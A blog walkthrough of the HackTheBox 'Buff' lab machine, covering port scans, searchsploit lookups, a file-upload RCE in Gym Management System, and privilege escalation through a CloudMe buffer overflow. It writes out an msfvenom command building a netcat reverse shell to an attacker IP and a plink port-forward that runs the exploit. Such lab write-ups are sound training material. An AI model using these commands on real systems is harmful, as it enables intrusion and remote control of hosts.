thewhiteh4t logo
esc

HackTheBox Buff Write up

Contents

ReconnaissanceIntrusionEnumerationPrivilege Escalation
---------------------------------
--- IP Address : 10.10.10.198 ---
--- Platform   : Windows --------
--- Difficulty : Easy------------
---------------------------------

Reconnaissance

Fast scan using FinalRecon and full scan using nmap...

Terminal window
$ finalrecon --ps http://10.10.10.198
 ______  __   __   __   ______   __
/\  ___\/\ \ /\ "-.\ \ /\  __ \ /\ \
\ \  __\\ \ \\ \ \-.  \\ \  __ \\ \ \____
 \ \_\   \ \_\\ \_\\"\_\\ \_\ \_\\ \_____\
  \/_/    \/_/ \/_/ \/_/ \/_/\/_/ \/_____/
 ______   ______   ______   ______   __   __
/\  == \ /\  ___\ /\  ___\ /\  __ \ /\ "-.\ \
\ \  __< \ \  __\ \ \ \____\ \ \/\ \\ \ \-.  \
 \ \_\ \_\\ \_____\\ \_____\\ \_____\\ \_\\"\_\
  \/_/ /_/ \/_____/ \/_____/ \/_____/ \/_/ \/_/


[>] Created By : thewhiteh4t
[>] Version    : 1.0.7


[+] Checking for Updates...[ Up-To-Date ]


[+] Target : http://10.10.10.198


[!] Starting Port Scan...


[+] Testing Top 1000 Ports...


[+] 8080   http-alt


[+] Completed in 0:00:03.785169


[!] Exporting to /usr/share/finalrecon/dumps/10.10.10.198.txt
Terminal window
$ nmap -p- -T3 -Pn 10.10.10.198


Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 22:52 IST
Stats: 0:00:51 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.80% done; ETC: 22:59 (0:05:54 remaining)
Nmap scan report for 10.10.10.198
Host is up (0.10s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
7680/tcp open  pando-pub
8080/tcp open  http-proxy


Nmap done: 1 IP address (1 host up) scanned in 267.59 seconds

So, just two open ports, next I performed version enumeration on these ports using nmap...

Terminal window
$ nmap -p 7680,8080 -Pn -sV 10.10.10.198


Nmap scan report for 10.10.10.198
Host is up (0.24s latency).


PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.93 seconds

After this I started enumerating different pages and source code for anything juicy and on Contacts page I saw this...

Figure 1 showing HackTheBox Buff Write up written by thewhiteh4t

I looked it up on searchsploit for potential matches and I got multiple...

Terminal window
$ searchsploit gym management system 1.0
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection          | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass       | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code | php/webapps/48506.py
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Intrusion

Exploit Title: Gym Management System 1.0 - Unauthenticated Remote Code Execution
Exploit Author: Bobby Cooke
Date: 2020-05-21
Vulnerability Description:


Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution on the Hosting Web server via uploading a maliciously crafted PHP file that bypasses the image upload filters

This exploit uses upload.php present on the web server to upload a malicious PHP file, to bypass extension allow listing it adds a double extension at the end of file name, to bypass file type check it modifies 'Content-Type' headers in the POST request to 'image/png'. In the 'file' parameter of the POST request it inserts a PHP 'shell_exec' payload to achieve code execution.

Figure 2 showing HackTheBox Buff Write up written by thewhiteh4t

At this point I tried to curl reverse shells but they were being removed constantly (antivirus?), finally netcat 64 bit worked!

Figure 3 showing HackTheBox Buff Write up written by thewhiteh4t

In HTB windows boxes the user flag is placed in Desktop of the user, I checked the Desktop of shaun and got user flag!

Enumeration

After some enumeration I found a setup file in Downloads directory...

Figure 4 showing HackTheBox Buff Write up written by thewhiteh4t

so I checked the running process using tasklist command to see if this application was running and it was! The filename of the setup file gives away the version of this application so that makes things a bit easier for finding an exploit...

Terminal window
twh.exe                       8680                            0      1,596 K
cmd.exe                       5052                            0      2,200 K
svchost.exe                   9620                            0      6,568 K
cmd.exe                       4956                            0      3,252 K
conhost.exe                   2468                            0     11,044 K
CloudMe.exe                  10064                            0     37,608 K
tasklist.exe                  9876                            0      7,472 K
taskkill.exe                  1540                            0      6,860 K

Privilege Escalation

Once again I looked it up on searchsploit and got these results...

Terminal window
$ searchsploit cloudme 1.11.2
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                  | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)         | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)         | windows/local/48840.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt         | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass | windows_x86-64/remote/46250.py
-------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The exploit is written in python and python was not installed on the machine, to tackle this challenge I used plink utility which comes along with the well know PuTTY. Plink is a command-line connection tool similar to UNIX ssh, one if it's command line options (-R) allows to forward remote port to local address, using this option I was able to connect to the target port which was only listening on localhost but before that I generated a shellcode using msfvenom which will execute netcat we downloaded earlier to send us another shell...

Terminal window
msfvenom -p windows/exec CMD="C:\\xampp\\htdocs\\gym\\upload\\twh.exe 10.10.14.55 5555 -e cmd.exe" -b '\x00\x0A\x0D' -f python -v payload

Figure 5 showing HackTheBox Buff Write up written by thewhiteh4t

I replaced the shellcode in exploit script with the fresh one I generated with my ip and port...

Figure 6 showing HackTheBox Buff Write up written by thewhiteh4t

Now I downloaded plink.exe using curl and started another netcat listening on port 5555 and launched exploit using the current netcat connection...

Terminal window
plink.exe -l twh -R 8888:127.0.0.1:8888 10.10.14.55 "python /home/twh/htb/buff/cmpwn.py"


-l -> username
-R -> listen-port:host:port
      Forward remote port to local address

Figure 7 showing HackTheBox Buff Write up written by thewhiteh4t

Got Root!

Figure 8 showing HackTheBox Buff Write up written by thewhiteh4t

Tags

ctf stegano stego windows injector cve poc rce kde dos

Other Posts

HackTheBox Armageddon Write Up
hack-the-box

HackTheBox Armageddon Write Up

thewhiteh4t

HackTheBox Jewel Write Up
hack-the-box

HackTheBox Jewel Write Up

thewhiteh4t

HackTheBox Omni Walkthrough
hack-the-box

HackTheBox Omni Walkthrough

thewhiteh4t